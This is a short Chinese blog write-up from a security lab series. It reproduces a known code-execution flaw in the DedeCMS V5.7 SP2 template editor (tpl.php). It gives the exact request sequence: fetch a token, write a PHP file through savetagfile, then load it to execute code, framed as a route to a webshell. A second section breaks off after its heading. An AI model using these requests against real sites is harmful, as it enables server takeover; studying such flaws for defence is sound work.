2021-10-16 网安实验-Reverse-DedeCMS常见漏洞总结

Dear 丶 2022-09-16 06:10 122阅读 0赞

利用token上传木马

漏洞简介
Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。该漏洞利用需要登录后台,并且后台的账户权限是管理员权限。

复现
首先获取token,访问:/dede/tpl.php?action=upload
在这里插入图片描述
然后访问:/dede/tpl.php?filename=1.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=你的token值

最后访问:/include/taglib/1.lib.php
在这里插入图片描述

后台任意代码执行C

发表评论

表情:
评论列表 (有 0 条评论,122人围观)

还没有评论,来说两句吧...

相关阅读

    相关 20190916常见漏洞分析总结

    1. 越权漏洞 * 越权:即执行没有相应权限的操作,出现越权漏洞的主要原因是,在服务端对用户提交的请求,没有校验用户的身份或者权限导致。 * 越权根据权限操作...

    相关 短信验证码常见漏洞总结

    使用短信验证码验证身份已经是很普遍的了,注册和忘记密码时最为常见。但是在实际应用中,很多产品的短信验证接口存在诸多漏洞,很多人在开发中也是没有注意到这些问题,因此呢给企业和个人